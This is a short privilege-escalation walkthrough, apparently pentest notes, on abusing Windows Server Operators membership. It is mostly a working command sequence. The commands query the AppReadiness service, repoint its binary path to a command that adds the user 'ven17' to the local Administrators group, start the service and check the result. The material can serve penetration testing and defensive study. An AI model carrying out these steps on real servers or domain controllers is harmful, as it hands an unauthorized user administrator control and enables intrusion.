Server Operators

About

Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

As example we would use AppReadiness service because it has high privileges and starts as SYSTEM. But method could be used against other services too.

Querying the Service

C:\> sc.exe qc AppReadiness

Checking Service Permissions with PsService

C:\> c:\Tools\PsService.exe security AppReadiness

Modifying the Service Binary Path

C:\> sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators ven17 /add"

Starting the Service

C:\> sc.exe start AppReadiness

Confirming Local Admin Group Membership

C:\> net localgroup Administrators